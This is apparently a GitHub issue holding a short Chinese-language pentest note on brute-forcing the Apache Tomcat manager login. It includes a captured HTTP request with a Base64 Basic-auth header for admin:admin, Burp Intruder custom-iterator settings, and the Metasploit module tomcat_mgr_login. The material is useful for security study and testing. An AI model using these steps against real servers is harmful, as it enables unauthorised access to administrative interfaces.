-
Notifications
You must be signed in to change notification settings - Fork 12
Open
Labels
Description
BurpSuite
访问http://host:port/manager/html
Burp抓包进行暴力破解
查看请求包,发现将输入的账号、密码重新编码为Base64密文:用户名:密码 > admin:admin > YWRtaW46YWRtaW4=
GET /manager/html HTTP/1.1
Host: 192.168.100.17:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.17:8080/
Connection: close
Cookie: JSESSIONID=C415245CC7B4597217A5869528EFB776
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
发送至Intruder模块,标记暴力破解变量(YWRtaW46YWRtaW4=),选择攻击类型(Sniper)

Payload设置,类型选择Custom iterator自定义迭代器,设置三个迭代payload分别代表:用户名
: 密码
用户名攻击载荷设置
:攻击载荷设置
密码攻击载荷设置
工具/脚本
Metasploit
use auxiliary/scanner/http/tomcat_mgr_login












